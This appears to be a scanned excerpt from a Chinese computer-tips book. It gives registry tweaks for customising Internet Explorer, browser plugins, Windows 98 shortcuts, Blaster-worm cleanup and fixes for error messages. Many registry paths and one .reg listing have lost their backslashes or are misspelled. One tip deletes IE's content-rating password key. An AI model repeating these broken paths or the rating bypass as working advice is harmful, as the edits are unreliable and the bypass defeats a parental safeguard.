想起朋友的生日就在今天, 需要在QQ 上问候一下,在平常只能在“开始”菜单中寻找或
将正在浏览的IE 浏览器窗口最小化再点击桌面上的QQ, 为什么不让QQ 的应用程序也像
NETAENTS 一样在IE 浏览器的工具栏中占有一席之地呢? 首先准备两张格式为ico
的小企鹅图标,然后打开注册 表编辑器,找到[HKEY_LOCAL_MACHINESoftware
MicrosoftInternet ExplorerExtensions],如果“Extensions”前面有加号,说明此前安装过能
在“Extensions”下生成键值 的软件(如网络蚂蚁),你可以按照已经存在的主键形式, 再
新建一个类似的主键( 不能完全相同)。反之你还可以从
[HKEY_LOCAL_MACHINESoftwareMicrosoftInternet Ex􀀗plor􀀖er ActiveX Compatibility]
“借”一个主键来使用。主键建好之后,在它右边的对话框中建立若干个字符串值: ①
“ButtonText”:双击并赋值为“吾Q 之家”,这是QQ 图标下面显示的文字;②“CLSID”:
这个字符串值的内容是 固定的,必须是{1FBA04EE-3024-11D2-8F1F-0000F87ABD16};③
“Default Visible”:这个字符串值用来定义图标是否可见,当然要填“YES”;④“Exec”:
它是用 来定义应用程序的路径及名称, 这里我们将其赋值为“ C:Program
FilesTencentQQ2000b.exe”(注意这里要填写自己QQ 的安装路径);⑤“HotIcon”:它的功
能是显示鼠标指 针指向该按钮时的图标,这里将准备好的一张企鹅图片的保存路径和名称
赋值给它;⑥“Icon”:不用说了,这个串 值的内容就要存放另一张图片的保存路径和名称
了(注意图标名称后面一定要跟有扩展名ico)。现在点击工具栏中的 企鹅图标,熟悉的QQ
登陆界面又出现了,既方便又快捷。看了这个例子,相信你会把更多的应用程序请进浏览器
里。 5.在右键菜单中添加网站链接
大家都知道,安装了网络的蚂蚁之后,在要下载的东 东上点击右键,就会看到“Down
All by Netants”的字样,点击它蚂蚁们就开始下载了。如果能把你常去的网站 地址加进去,
比如你的主页⋯ ⋯ 呵呵, 其实很简单: 打开注册表编辑器, 找到
[HKEY_CURRENT_USERSoftware MicrosoftInternet ExplorerMenuext],在其下新建一个主
键,名字取为你想在右键里出现的链接,然后在新建的主键下 新建Dword 值,命名为
“con-texts”,取其值为16 进制的f3, 再把“默认”键的键值填成你希望链接的HTML 文
件的路径。例 如:右键菜单中出现“电脑界应用文萃”,那么在给“默认”键 赋值的时候
就要填写www.cfan.com.cn,这样在某一个htm 文件 中点击右键,选择“电脑界应用文萃”
就可以直接链接到它的网站了。 6.跳动的IE 浏览器窗口
129 电脑高手知识精华
电脑高手从fcbu.com开始
看惯了动感效果很强的FLASH,你有没有想过让你的 IE 浏览器也动起来。下面我们
一起来实现它吧! 打开注册表编辑器, 找到[HKEY_CURRENT_USERControlPanel
desktopWindowMetrics],在右边的窗口中新建两个字符串 值,分别是“Minanimat”与
“Maxanimat”,最后分别双击它 们并赋值为“0”和“1”,就完成了。赶紧欣赏一下动感
的 IE 浏览器吧! 7.将“链接”一改到底
对于经常爬网的虫虫们,经常为IE 浏览器工具栏左下 角一成不变的“链接”二字感到
乏味, 那我们就来改改让人反感的两个字。打开注册表编辑器, 找到
[HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerToolbar],在右边的窗口双击
一个名为“LinksFolderName” 的字符串值,然后将自己的喜欢的一句话敲进去,点击“确
定”按 钮就可以了。 软件工具篇
看了上面的文章是不是觉得用“注册表编辑器”个性 化IE 浏览器有些麻烦?其实热心
的网友早就制作了可以修改IE 浏览器的软件,利用它们就可以很轻松地更改IE 浏览 器了。
在这里我们使用的是一个叫做“IE 个性化设置”的软 件,这是一款共享软件,上文中介绍
的方法它都可以实现, 所以并没有功能上的限制, 你可以去作者的主页(http://
love102.myetang.com/software/fullmyie.zip)下载,安装文件 的大小为1.02MB。 安装
结束后你可以从“开始”→“IE 个性化设置”→ “IE 个性化设置”打开软件。从图中可以
看出这个 软件的主要功能被分为5 大块,在①处可以更换工具栏背景和Logo 图标;在②
处可以在工具栏中添加应用程序按钮 和更改主页设置;在③处可以更改IE 标题栏和在右键
菜单中加入链接;在④处可以更改IE 的版本号和默认下载路径; 在⑤处可以更改开机时弹
出的对话框。软件的工具栏中也有7 个快捷按钮,它们的作用分别是“访问作者主页”、“加
/ 解锁首页设置”、“加/解锁注册表编辑器”、“屏幕涂鸦”、“显 示桌面”、“给作者发Email”
和“退出软件”。 软件的使用方法很简单,下面我就以在工具栏中加入 QQ 图标为例
简单说明一下软件的用法: 1.首先将软件切换到“按钮及主页设置”选项卡,然 后
点击“现有非IE 原标准按钮”项中的“新建”按钮。 2.这时会弹出一个窗口,在“输
入按钮名字”后面的 对话框中输入“我的QQ”,这句话将会出现在QQ 图标的下 面;然
后分别点击“按钮图标”和“热图标”后面的“选择”按钮从硬盘中寻找QQ 图标,“热图
标”是指将鼠标指 针移动到工具栏出现的图标后出现的图标;接下来点击“执 行程序”按
钮从硬盘上找到QQ 的应用程序QQ2000.exe。 3.现在点击“确定”按钮,重新打开
IE 浏览器,熟悉 的QQ 图标在工具栏中出现了吧!点击一下试试看,弹出的是不是QQ 的
登录框? 注:如果你想点击按钮后弹出某个网页的网址,则可 以点击图9 中“执行脚
本”后面的“选择”按钮然后在硬盘 上选择一个htm 文件就可以了。当然这个htm 文件我
们也要制作了,不过制作方法很简单,只要打开“记事本”,输入 下面这句话:
你只要将其中黑体字部分换成自己点击后想出现的网 址就可以了,现在将这个文件另
存为一个htm 文件即可。 在IE 浏览器工具栏中添加程序按钮的操作已经是最麻 烦的
了,这你都掌握了,其余的还用我再说吗?^_^ 疯狂插件篇
IE 浏览器拥有着广泛的用户群,于是就出现了许多的 IE 浏览器插件。安装了这些插件,
不但使IE 浏览器的功能更加强大,而且会使你的IE 浏览器更加具有个性。下面我 们就一
起来看看吧! 1.必备插件
随着网络流媒体、Flash 的出现和发展,在网络上使用 的文件类型越来越多,这样IE
浏览器便不堪重负了,要想让自己的网上之旅更轻松,那么一定少不了以下这些插件:
Flash 插件:目前许多网页都含有大量的Flash 动画,没 有这个插件可是连《东北人都是活
雷锋》都看不了。 RealPlayer 和QuickTime 插件:如果你喜欢在网上听 歌,那么肯定
130 电脑高手知识精华
电脑高手从fcbu.com开始
少不了RealPlayer 插件了,许多在线收听的站点都需要;尽管MOV 格式的视频由于体积缘
故在网上 应用不多,但随着宽带的慢慢普及,已经有不少站点推出了在线收看MOV 格式
的视频,所以QuickTime 插件也是必 不可少的。 这三个插件的安装文件在每期的《电
脑界光盘》都有收录。
2.网易的EaseBar 网易的EaseBar 是网易推出的一款IE 浏览器增强插件, 你可以
到http://www.easebar.com/installhelp.htm 在线安装, 也可到
http://www.easebar.com/EaseBar1108.EXE 下载安装 文件本地安装,安装完毕后重启IE 浏览
器,就可以在浏览器工具栏下方看到EaseBar 了。利用这个插件你 可以更改IE 工具栏的背
景;更改网页默认的源文件编辑器; 订阅网易频道等,这一切都只要点击工具栏中的“设
置”图 标后按需选择即可。
★如果你有网易的通行证,那么可以点击“设置”图标后选择“选项”,选中“网易通
行证”,然后在后面填上 “用户名”和“密码”,接着再将“个性化选项”中的“默认 频道
账号”改为“网易通行证”。以后你就可以快速进入自己的社区了。
★这招适合自己单独使用电脑的朋友,在网吧上网 的朋友可不要这样做哦!要不你的
小秘密可就被别人发现了。
★其实早在EaseBar 推出之前,国外一家名为hotbar 的网 络公司就已经有相似的插件,
而且更漂亮、功能更强大,你可以到http://www.hotbar.com 去下载和安装。 3.封杀讨厌
的广告窗口 上网时那些莫名其妙跳出来的广告、友情链接窗口很 烦人吧?只要我们安
上一个Zero Popup 插件,就可以彻底封杀这些弹出窗口。Zero Popup 通过使用智能代理技
术, 可以在无人参与的情况下杀除一切弹出窗口。 首先到
http://dl.163.com/html/6/6369.html 下载Zero Popup,它的大小只有95KB,该软件只有启动
IE 浏览器时才 会出现,并且跟随IE 浏览器一同自动关闭,并且只占用很少的系统资源。
启动后会在系统托盘处出现图标, 默认状况为启动,并毫不留情地封杀一切弹出窗口,如
果想 暂时让它停止,只要双击其图标即可。 4.增强IE 浏览器的搜索能力
Google 是一个非常著名的搜索引擎,前一阵它推出了 Google 的搜索工具条,你可以去
其网站申请安装(http:// toolbar.google.com)。安装完毕后便会在工具栏中看到Google 的搜
索工具条。使用方法很简单,只要输入关键 字然后回车即可。不过在安装时要注意的是,
它会询问你是否同意一份隐私协议:如果你想用有PageRank(用来表 示网站的知名度)工
具条,那么在你上网过程中所有访问的地址都将被送往Google,供其分析各个网站被访问
的情 况。在我看来这个PageRank 可要可不要,虽然它保证不泄露隐私,但还是小心为妙。
5.让网站注册器帮你填表
网上提供免费服务的网站是不计其数,但你在使用这 些服务之前必须要注册,把自己
的个人资料提供给网站,这 就是免费服务的“代价”。为了获得这些免费服务,我们要 不
停地在各个网站间进行注册,而填写的内容是大同小异的,一般都是用户名、口令、电子邮
件地址、姓名、性别、 出生年月等。如果在每个网站都要重新填写,非常麻烦。现 在有了
网站注册器就可以把这些个人信息事先保存起来,如要注册时直接调出来让程序填写即可,
大大减少了重复 输入信息的工作量,提高了注册效率。安装后,该软件将和IE 浏览器捆绑
在一起,你可到http://www.softcows.com/ arsetup.exe 下载,使用方法可以参考2001 年12 月
号文萃杂 志的《网上智能填表高手“网站注册器”》一文。 6.一起来画网页
E-Quill 以一种独特的方式来修理网页,它集成在浏览 器里,在浏览器下端以工具条的
形式出现,在浏览网页时, 你可以用E-Quill 在网页上圈圈点点,把重点内容加亮,删 改
内容,加评注,感觉就象老师批改作业那样,还支持邮件发送当前网页,屏幕截取,和收藏
131 电脑高手知识精华
电脑高手从fcbu.com开始
夹功能。 7.在线编辑图像文件
基础的图像管理工具通常不能提供给你象Photoshop 那样 广泛和多样的功能,但如果
你喜欢欣赏在线图片,Innomage 这个插件可以让你方便地修改和保存它们到你的PC。
安装 Innomage 后,你不会看到浏览器产生了什么变化,但当你访 问一张你喜欢的图片的
时候(例如JPEG、BMP、TIFF 或PCX 的 文件),简单地点击它便会出现Innomage 工具条,
接下来就 可以对在线图片进行编辑和修改,当你觉得图片已经完美时,Innomage 可以直接
打印或保存它们到你的硬盘中。 8.多画面浏览器
你喜欢不喜欢多画面电视?以全屏幕的方式收 看一个频道,而其它台以小屏幕的方式
显示在角落中。如果你喜欢,那么你一 定会装上Girafa 这个软件(如图13)。安装完这个
免费的插件后,你可以在没 有浏览这个网站之前就看到它的网站页面。当你点击“查看”
→“浏览栏”→ “Girafa”,就会看到在浏览器的左边显示出一个狭窄的窗口。输入要查找
的站 点关键字,点击相关链接,Girafa 的窗口将会显示网站第一 页的微缩图。将你的鼠标
移动到微缩图上,一个迷你的站点 描述将会弹出来,点击微缩图,你将会直接进入这个站
点。 好了,经过上面的一系列的个性化设置,相信你再次 上网冲浪的时候,一定感觉
很爽了。 Plug-in 本身是一种程序的名称,中文称作插件,是为了支持浏览器原本没有
的功能所发展出来的附加程序。
1996 年,位于美国加州的网景公司发布了一种程序能 支持网络上的多媒体文件如声音文件
(.wav)、动画文件(. mov)、电影文件(.avi)等,取名叫“Plug-in”。当时网景发 展Plug-in
是为了弥补其浏览器Netscape Navigator 无法支持多媒体格式,所以需要Plug-in 辅助。在
Netscape Navigator2.0 以后的版本都已经内建部分Plug-in 的程序,另外也有其他厂 牌的软
件商参于开发不同的Plug-in 程序。 Plug-in 就如同它的英文原意一样,以插入式的程
序来 设计,是一种附加的程序,通常无法独立执行的,必须和其它软件搭配使用。Plug-in
的用途极广,像是Adobe Photoshop 就可以利用Plug-in 程序来排列插图,Aldus PageMaker
排版软件也可用Plug-in 程序来完成简单的排版工作。 编注:关于IE 浏览器插件还有
很多,其中有些功能可能有 些重复,有些功能大家都不太常用。鉴于版面宝贵,我们把有
关IE 浏览器插件的专题放进了本期光盘里;同时本文 所涉及任何一款软件亦可在本期光盘
中找到,想拥有更多的插件吗?想让你的IE 浏览器更具个性吗?一切尽在本期 光盘中。
1、把“我的文档”搬出去
在Win98 中“我的文档”是很多应用程序默认的文件保存地址,一旦Win98 所在的分区被
破坏,存放在“我的文档”中的文件就丢失了。对此,最好的解决方法就是把“我的文档”
从C 盘搬到其它盘里(非系统分区),这样即使系统崩溃也没什么。用右键点击“我的文档”,
选择“属性”,在“目标”栏填好存放路径即可。2、随心所欲设置显示器刷新率一法运行注
册表编辑器, 依次打开
HKEY_LOCAL_MACHINESystemCurrentcontroplSetServiesClassDisplay000MODES, 其
下一般有“16”、“32”、“4”、“8”四个主键(有些是三位主键),我使用的是16 位色,双击
“16”后选800×600(如果你设置的分辨率是1024×768 便选“1024×768”,以此类推),
新建“字符串值”命名为“RefreshRate”,然后修改其键值为85(这个值为显示器的刷新率)
132 电脑高手知识精华
电脑高手从fcbu.com开始
或更高,这就要看你的显示器的承受能力了。3、五笔&全拼编码互查用五笔输入法最头痛
的是忘了怎么拆字,不过我们可能通过全拼输入法来查其五笔的编码。具体操作非常简单。
打开控制面板,双击输入法,打开输入法属性,双击全拼输入法,在编码查询窗口选择五笔
字型,按确定即可(前提是你已经安装了五笔输入法)。此时我们再用全拼打字,当文字输
入后,在输入栏中出现了几个绿色的字母,这就是你刚才输入的字五笔编码。4、让记事本
记录你每次编辑文本的时间你只须按下F5 键,就可以在文尾自动加上当前的时间。如果你
觉得这样太麻烦,可以在记事本打开一个文件后,在文章的最开头键入“.LOG”(须用大写),
这样在每次存档或关闭时,程序都会自动记录时间。5、如何恢复“显示桌面”不小心把“快
速启动栏”里的“显示桌面“删除了,怎么办呢?你可以在C:WindowsApplication
DataMicrosoftInternet ExplorerQuick Lauch 中新新建一个文本文件,并在文件里写入如下内
容:
[Shell]
Command=
IconFile=explorer.exe.3
[Taskbar]
Command=ToggleDesktop
然后将这个文件保存为ShowDesktop.scf,这样“显示桌面”就回来了。6、IE 也玩断点下载
现在下载软件虽然很多,但还是有许多时候我们不得不使用IE 中自带的下载工具。但它不
支持断点下载。IE 通常会将下载完成的文件放在C:WindowsTemporayr Internet Files 目录下,
我们可以从此处下手。例如下载的文件是a.zip,当意外发生或取消下载后,IE 会在Temporay
Internet Files 产生a.zip 的临时文件,此时一般会有两个a.zip 在里面,如:
a.zip 12.000 KB 2002-7-1 14:18
a.zip 0KB 1999-7.2 13:00 两个文件的文件名一样,但大小和创建时间不同,显然,是第二个
文件覆盖了第一个文件,当再次下载a.zp 时IE 只认第二个文件,所以从0KB 开始下载,解
决方法是将第二个或较小的文件删除,下载时IE 就会从1200K 处继续下载了。7、自制五
笔输入法安装盘有时候格式化硬盘或者重装Win98 都会导致五笔输入法“失踪”,在“控制
面板→输入法→添加”里面根本没有五笔输入法。而手头一时又没有五笔输入法的安装盘。
怎么办呢?其实我们可以到另一台装有五笔输入法的电脑里作一个五笔输入法的安装盘。具
体操作如下:首先准备一张软盘,把C:WindowsSystem 目录下Wbx.ime、Wbx.mb、Wbx.hlp、
Wbx.emb 四文件复制到软盘,再用记事本新建两个文件,第一个命名为Setup.bat,并写下
如下内容:Copy A:Wbx.* C:WindowsSystem*.*。第二个命名为Wbx.reg,
内容如下:
REGEDOT4
[HKEY_LOCAL_MACHINESYSTEMCURRENTCONTROLSETCONTROLKEYBOARDL
AYOUTSE0230804]
"IME file"=”Wbx.ime"
"Layout file"="kbdus.kbd"
"layout text"="五笔输入法"然后我们先运行Setup.bat。再运行Wbx.reg,然后到“控制面板
→输入法→添加”就可以找到五笔输入法啦。8、巧输汉字偏旁部首在Windows 中,当你需
要在文档中输入汉字的偏旁部首时,可以使用在“全拼输入法”中直接键入拼音“pianpang”,
此时系统将提供41 个常用的偏旁部首供你选择使用。9、直接在IE 中调用Dreamweaver 时
行编辑打开“我的电脑”,选菜单栏上的“查看→文件夹→文件类型”,在“已注册的文件类
133 电脑高手知识精华
电脑高手从fcbu.com开始
型”中选择“Microsof HTML Document 5.0”,然后单击“新建”,在“操作”文本框中输入
edit,在“用于执行操作的应用程序”文本框中输入你的电脑中Dreamweaver 的执行路径,
如“"C:DreamweaverDreamweave.exe"”,注意两边的双引号不能丢。单击“确定”后,你
就能在IE 中直接调用Dreamweave 进行编辑了。不过下次启动后IE 默认的编辑器还是
Windows Notepad。你可以打开IE,选菜单栏上的“工具→Internet 选项”,在弹出的窗口中
选“程序”,然后在“HTML 编辑器”下拉菜单中选中“Dreamweaver”,确定后IE 默认的
编辑器就是Dreamweaver 了。10、去除IE 的分级审查
去除IE 的分级审查可以通过注册表来解决, 运行Regedit 后, 找到
KEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies,由于口令是子
键Ratings 内的键值,打开后删掉Ratings 键值即可。11、如何连续播放RM 影音文件看过
很多地方都有介绍如何连续播放RM 影音文件的方法,方法大都是一个,就是用文本编辑
器编辑一个.m3u 或者.ram 的文件,并在里面写上要播放文件的绝对路径。其实还有一个更
简单的方法,用鼠标选中所有你想要播放的文件,然后把它们拖拽到Real player 播放器的
窗口中。Real play 就会为你连续的播放这些RM 文件了。(这个方法也适合其它媒体文件,
如mp3 等)12、发送大邮件技巧一则一些邮件服务器会限制我们发送邮件的大小,但时我
们有时发送的邮件会超过限制,这时我们可以利用OE 将大型邮件拆分成几个小部分发送。
单击“工具→帐号”,在“邮件”选项上,单击“属性”,在“高级”选项上选择“拆分大于
X KB 的邮件,然后设定发送文件的最大值即可。当收信人收到邮件后,可以利用”组合并
编码“来组合邮件,按住Ctrl 键,依次单击对方发来的数封邮件,然后松开Ctrl 我,邮件
会组合并解码,最后在出现的对话框中按下“确定”就行了。13、自力更生删除冗余DLL
文件许多应用程序在安装时都会向Windows 里塞上大堆DLL 文件,在很多时候反安装也不
能够把它们清除干净。不过我们可以自已动手来清除它们。打开注册表, 在
HKEY_MACHINE_SoftwareMicrosoftWindowsCurrentVersionSharedDLLS 下查找键值为
“0x00000000(0)”或“0x00000000”的DLL 文件,然后在左边的“名称”栏中查看该DLL
文件的名称和路径,并将它记下来。如果你不知道那一个是DLL 垃圾,可以双击你怀疑的
DLL 文件,在弹出的“编辑DWORD 值”对话框中查看,其键值为“0”(十六进制)的,
就是DLL 垃圾;键值为“1”或比“1”更大的数,就是正常的DLL 文件。打开“资源管理
器”,对照刚才记下的DLL 文件的名称和路径将DLL 文件删除(注意备份)。返回注册表,
右键点击你找到的DLL 垃圾,将其删除。14、快速选定文件一法在资源管理器窗口中按任
一字母键(A-Z)或数字键(0-9),可快速选定以该字母(或数字)开头的第一个文件,再
按同一键可选定以该字线(或数字)开头的第二个文件,以此类推,直至找到所需文件(查
找到最后一个文件时,再按该键又会回到以该字母或数字开的第一个文件)。这样就能方便
的从很多文件中查找到所需的文件。此方法同样适用于打开文件对话框和Winzip 等软件的
同类窗口。15、自动清除文档内容在与别人共享一台机器时,你如果不想让他人知道你曾经
打开过什么文件,你也许会在每次用完机器后清除“文档”菜单中的内容,可是这样会很麻
烦。现在就让笔者告诉你一个小技巧,就是让系统自动清除“文档”菜单中的内容,方法如
下:打开注册表编辑器,在HKEY_CURRENT_USER 下,新建一个DWORD 类型
值:ClearRecentDocesOnExit,设其值为1,下次你用完机器后,只要关机或重启,“文档”菜
单中的内容就自动被清除了。16、快速关闭没有响应的应用程序我们常常会碰到应用程序很
长一段时间没有响应的情况,最终系统弹出一个对话框,询问你是要等待呢,还是结束任务,
还是取消!这时如你希望系统继续处理没有处理完的工作,以正常的方式退出的话,你可以
更改这个程序的等待时间来实现快速关闭, 方法如下: 打开注册表编辑器, 在
134 电脑高手知识精华
电脑高手从fcbu.com开始
HKEY_CURRENT_USER 分支下,在右边新建一个串值waittokillapptimeout,设其值为
1000(毫秒)。17、让Win98 也预览在Windows 2000 中,当我们用鼠标指向一个多媒体格式
的文件时,(如MID、WAV、MP3、MPG、BMP、GIF 等),系统会自动在文件列表左边列
出该文件的缩略图:对图形文件会显示出该文件的概貌,对声音及电影文件会出现一个播放
条,点一下播放按钮就可以不用打开播放器直接欣赏音乐和观看电影了。这似乎是Windows
2000 的特有功能,在我们常用的Windows 98 中可以预览图形文件,但声音及电影文件就不
行了。如何让Windows 98 也实现这项功能呢?如果你的Windows 98 使用的是新版媒体播
放机,可采用如下方法:1.用记事本或其它文本编辑软件打开Windows.htt 和Folder.htt 这
两个文件。注意:这两个文件是隐含文件,必须在文件夹选项中设置显示所有文件才能看到
它们。2.找到var wantMedia=false 行,将它改为var wantMedia=true。以后,在Windows 98
中,当我们选中声音文件或电影文件时,文件列表左边就会出现一个播放条,点下播放按钮
就可以预览了。但当选中MP3 或VCD 影碟上DAT 格式文件时,Windows 却无丝毫反应。
让我们再来修改上述的两个文件。
3.找到if (ext == ′avi′ || ext == ′mov′ || ext == ′qt′ || ext == ′mpe′ || ext == ′
mpeg′ || ext == ′mpg′)和if (ext == ′aif′ || ext == ′aifc′ || ext == ′aiff′ || ext ==
′au′ || ext == ′mid′ || ext == ′rmi′ || ext == ′snd′ || ext == ′wav′|) 这两句。在
第一句末尾添加“|| ext == ′dat′”,在第二句未尾添加“|| ext == ′mp3′”,要注意添加
的内容必须被包含在括号内,顺序前后都没关系。好,现在让我们试一试,点中一个MP3
或VCD 影碟中的DAT 文件,怎么样?Win98 是不是也实现了对多媒体格式的预览了?18、
右键添加“用记事本打开”Windows98 自带的记事本(Notepad.exe)是一个非常实用的工
具,它可以打开的文件种类较多,但大多数文件的默认打开方式不是记事本,在实际应用时
还得一步步在“打开方式”里去查找Notepad.exe 程序。如果在右键菜单中添加一个“用记
事本打开”就方便多了。那怎么做呢?有两种方法:一是修改注册表,运行“regedit”打开
“HERY_CLASSES_ROOT”,在“*”上单击右键新建一个名为“Shell”的主键,(如该项
下已有此主键,则无须再建)。用同样的方法,在“Shell”下新建一个名为Notepad 的主键,
在右方的窗口单击右键把默认键值修改为“用记事本打开”。在Notepad 下新建一个名为
Command 的主键,在右方窗口单击右键把默认键值修改为“Notepad.exe %1”。关闭注册表
编辑器。任意找一个文件单击右键,怎么样?是不是右键菜单里多了一个“用记事本打开”
的选项?如果你觉得修改注册表太麻烦,也开以用另一种方法,打开“C:WindowsSenTo”,
把记事本的快捷方式复制到此目录下,以后只要在文件上单击右键,在菜单内选择“发送到”
→“记事本”就可以了。19、如何使自己的QQ 昵称排在前面QQ 的好友姓名显示顺序是字
母优先于汉字,数字优先于字母,而空格的优先级又高于数字。在不改变自己昵称的前提下,
在你的昵称前加一两个空格,你的昵称就排在好友名单的前面了。20、使用机箱上的Power
按钮安全关机我们知道关闭电脑时可以用开始菜单里的关机命令。这样才能安全地关闭计算
机,但是直接用机箱上的Power 按钮也可以做到这一点。前提是你的电脑必须得支持ACPI
高级电源管理,在安装Win98 时带参数/pj 安装,就能让Win98 装上高级电源管理(默认情
况下Win98 是不会安装高级电源管理接口的)。但是,如何在不重装系统的情况下让电脑也
具有高级电源管理功能呢?打开系统属性,在“设备管理”中的“系统设备”下选中“即插
即用BIOS”,查看其属性,再单击“驱动程序”这一项,按下“升级驱动程序”按钮,在随
后弹出的窗口中选中“显示所有硬件”,在“标准系统设备”中选中“ACPI BIOS”并安装
即可。如果ACPI 安装正确的话,在“控制面板”中的“电源先项”中应该有“高级”这一
页,在这里你就可以设置当按下电源按钮时的操作了。如关机、休眠等。21、定制自己的“发
135 电脑高手知识精华
电脑高手从fcbu.com开始
送”菜单我们知道,在Win98 的右键菜单的“发送到”选项里有:3.5 寸软盘,我的文档等
项目,可以让我们很方便的把文件发送到这些地方,但是有时候想把文件发送到别的地方怎
么办呢?请单击“开始”,然后单击“运行”,在“打开”对话框中键入“SendTo”,然后按 ENTER
键。用鼠标右键将项目图标拖至“SendTo”窗口中,这样快捷方式就出现在“发送到”菜单
中了。这些快捷方式可以是打印机、
传真、网络驱动器或 Windows 应用程序。22、用IE 浏览器上传主页关于主页传送,可以
直接用专门FTP 软件或者FTP 命令。但也可以用IE 浏览器直接传送主页,并且相当方便简
单。下面以 http://ftp.go.163.com 为例,说明其用法。在IE 浏览器的地址栏中键入:ftp:
//ftp.go.163.net,IE 会跳出一个登录画面。在登录画面里输入用户名和密码后,你会发现
远程文件和文件夹都显示在浏览器里面。这时,你可以直接用Windows 98 中的粘贴,复制,
重命名等像操作本地硬盘一样操作远程文件23、巧用Shift 键当要先后打开两个程序时,你
要一次又一次地点开始→程序→⋯⋯真是很麻烦。其实你只要在点击第一个须要打开的程序
的时候,按住Shift,那么在启动程序的同时开始菜单并不消失,这样你就业可以再指向下
一个程序了。24、改变音量控制面板的大小
我们经常都会通过点击Windows 桌面任务栏上的音量控制图标来调节,你是否觉得打开的
窗口太大,而且不能通过拖动来改变大小!按下Ctrl+S,怎么样??是不是整个面板更紧凑
了?25、快速建立相同的IE 窗口使用IE 浏览时,为节约时间经常须要同时进行几种操作,
难道要重开一个窗口,就又要重填一次网址??只要按下“Ctrl+N”,就建立了相同的IE 窗
口。26、在Word 文档中选择列在Word 中可以很方便的选择一行文字,但是选择竖着的一
列就没有那么简单了。按住Alt 键再向下拖动鼠标就可轻松的选定第一行的同一列文字。27、
最大化最小化所有窗口有时候我们在操作多个窗口时要返回桌面。难倒我们要一次又一次点
击“最小化”按钮??有一个快捷键Win+D(Win 键就是在Ctrl 和Alt 中间的那个)可以同
时最小化和还原所有窗口。28、几个实用的快捷键在资源管理器中,可以用消除键
(Backspace)快速的返回上一层目录(作用相当于“向上”按钮)。可以用“Alt+→”和“Alt+
←”来控制浏览器在的前进和后退。可以用Win+Pause 来打开系统属性。
解决WINXP 系统开机后弹出Generic host process for win32 services 遇到问题需要关闭!
出现上面这个错误一般有三种情况。
1.就是病毒。开机后会提示Generic Host Process for Win32 Services 遇到问题需要
关闭”“Remote Rrocedure Call (RPC)服务意外终止,然后就自动重起电脑。一般该病毒会在
注册表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 下
建立msblast.exe 键值,还会在c:windowssystem32 目录下会放置一个msblast.exe 的木马程,
解决方案如下:
RPC 漏洞
详细描述:
最近发现部分RPC 在使用TCP/IP 协议处理信息交换时不正确的处理畸形的消息导致存在一
个安全漏洞。该漏洞影响使用RPC 的DCOM 接口,这个接口用来处理由客户端机器发送给
服务器的DCOM 对象激活请求(如UNC 路径)。如果攻击者成功利用了该漏洞将获得本地系
统权限,他将可以在系统上运行任意命令,如安装程序、查看或更改、删除数据或者是建立
136 电脑高手知识精华
电脑高手从fcbu.com开始
系统管理员权限的帐户等.
已发现的一个攻击现象:
攻击者在用户注册表
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 下建立一个
叫“msupdate”(估计有变化)的键,键值一般为msblast.exeC:windowssystem32 目录下会放
置一个msblast.exe 的木马程序.
另外受攻击者会出现“Generic Host Process for Win32 Services 遇到问题需要关闭”“Remote
Rrocedure Call (RPC)服务意外终止,Windows 必须立即重新启动”等错误信息而重启。
建议到http://www.microsoft.com/security/security_bulletins/ms03-026.asp 下载相应补丁。如果
已受攻击,建议先拔掉网线,在任务管理器中结束msblast.exe 进程,清除注册表中的相应
条目,删除system32 下的木马程序,最后打补丁。
第二种情况是排除病毒后,还出现这样的问题,一般都是IE 组件在注册表中注册信息被破
坏,可以按下面的方法去解决该问题:
1。 在"开始"菜单中打开"运行"窗口,在其中输入"regsvr32 actxprxy.dll",然后"确定",接着
会出现一个信息对话 框"DllRegisterServer in actxprxy.dll succeeded",再次点击"确定"。
2 再次打开"运行"窗口,输入"regsvr32 shdocvw.dll
3 再次打开"运行"窗口,输入"regsvr32 oleaut32.dll
4 再次打开"运行"窗口,输入"regsvr32 actxprxy.dll
5 再次打开"运行"窗口,输入"regsvr32 mshtml.dll
6 再次打开"运行"窗口,输入"regsvr32 msjava.dll
7 再次打开"运行"窗口,输入"regsvr32 browseui.dll
8 再次打开"运行"窗口,输入"regsvr32 urlmon.dll
如果排除病毒问题后,做完上面的几个IE 组件注册一般问题即可得到解决。
3.如果电脑有打印机,还可能是因为打印机驱动安装错误,也会造成这个错误。解决方法如
下:
重装打印机驱动程序。
一般情况下做到上面三步后,该问题即可得到全面解决
电脑出现错误信息的故障排除(1)
1、出现TASKMON caused an invalid page fault in module KERNEL32.DLL
(1)适用范围:Windows Me、Windows 98
(2)症状:开机进入操作系统的时候(或关机时),即出现:
TASKMON caused an invalid page fault in module KERNEL32.DLL 或
137 电脑高手知识精华
电脑高手从fcbu.com开始
EXPLORER caused an invalid page fault in module KERNEL32.DLL
或者在开启资源管理器的时候,也会发生上面的错误讯息。
(3)原因:位在 Windows 目录下的 Applog 文件夹损坏就有可能产生这个状况,因为在进
入 Windows 、或是要关机的时候,Task Monitor 会更新这文件夹里面的纪录文件,如果这
个文件夹损坏,它就没有办法更新,就会产生错误信息。
(4)排除:在桌面打开「我的电脑」,进入 Windows 文件夹。 选「查看」>>「文
件夹选项」到「查看」页,选择「显示所有的文件和文件夹」,按确定(因为 APPLOG 是
隐藏文件夹,要显示隐藏文件,我们才能看到它)再进入Windows 文件夹。在Applog 文
件夹上按鼠标右键选「删除」 重新开机,操作系统会重建一个新的 Applog 文件夹。
2、出现_DELIS caused a general protection fault...
(1)适用范围:Windows 95、Windows 98
(2)症状: 软件安装到一半,常会出现 _DELIS 这个程序没有响应,或是:
出现_DELIS caused a general protection fault in module _ISDEL.EXE at ..... ,
(3)排除:这是因为防毒软件干扰安装的关系,如果你在安装某套软件时会出现这种状况,
请在安装该软件之前,先暂时关闭你的防毒程序,即可解决这个问题。
(4)补充说明:_DELIS 是 InstallShieled (很多软件都是使用这套安装程序)掌管安装后
删除临时文件的工作,在安装过程中,有些暂时的文件会先存放在 WindowsTemp 下,安
装完毕,就自动删除,_DELIS 如果不能正常执行的话,这些临时的暂存盘就不会被删掉,
你可以自己把 Windows/Temp 下的文件删除,Windows/Temp 本来就是存放一些站存盘用
的,里面的东西你都可以清除掉而不会影响到系统。
3、出现Explorer caused an invalid page fault in module Kernel32.dll
(1)适用范围:Internet Explorer
